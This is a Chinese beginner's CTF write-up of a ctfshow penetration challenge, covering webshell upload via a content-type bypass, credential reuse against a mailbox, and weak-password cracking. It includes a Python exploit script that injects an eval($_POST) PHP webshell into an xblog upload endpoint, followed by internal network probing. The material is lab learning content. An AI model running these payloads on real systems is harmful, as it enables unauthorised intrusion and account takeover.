一、匿名聊天室
匹配聊天后左下角有上传文件功能。
经测试是content-type检测,修改内容为一句话木马即可,文件被重命名但是不知道上传路径在哪。
点击首页的“查看帮助”,在GitHub中找到了源码。
对photo_upload.php进行审计,发现了上传路径为/images/photo/,把开始上传的一句话木马加上路径访问。
使用蚁剑成功连接,拿下第一台机器。
找到用户密码数据hacker_ctfshow@163.com/Hacker_ctfsh0w,以为是admin.php的账户密码,进入后台管理发现用处不大。
二、163邮箱
仔细观察可能是邮箱账号,尝试登录163邮箱成功,并有一封加密邮件。
通过弱口令123456破解邮件成功。
三、xblog开发
进入开发地址,是xblog源码。
审计源码,在c/t.php中,没有对$d进行过滤,存在上传漏洞。(这里自己审计不出来,感谢wp)
先登录https://blog.ctfer.com/a/获取cookie。
运行python脚本传入参数,得到文件名0.php,木马地址为p/0.php(这里python基础不好,代码为wp中的内容)
import requests
url = "https://blog.ctfer.com/c/t.php"
cookie={
"PHPSESSID":"c43f3fb2ac045580e50a7f5b696c87fa"
}
data={
"dat":'";eval($_POST[1]);?>',
"title":"1",
"content":"%20",
}
response = requests.post(url=url+"?type=submit",data=data,cookies=cookie)
print(response.text)
使用蚁剑连接,拿下第二台机器。
四、内网探测
查看网卡信息IP为192.168.102.3,并上传ping脚本探测是否有内网存活主机。
发现内网存活主机192.168.102.2
探测开放端口,发现8090开放
后续内网的横向渗透因为个人能力不足且没有vps就做不下去了,可以参考官方wp:https://ctf-show.feishu.cn/docx/RO1ydCc3Ko33tjxkGiNcTkM6n9b?share_token=150bb8d8-757f-4bbe-bf8d-029cee388dfc
总结:
自己还是太菜了,后面的代码审计和python脚本的编写基本都得看wp才能做下去,以及后续fastjson漏洞实现rce因为不了解Java无法复现。也让我知道了自己还有很长的路要走,得把代码审计和python这两个短板先补上。最后感谢群主搭建这个平台,让我这种刚学ctf的小白哪怕后面自己做不下去了也能参与进来!
761
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
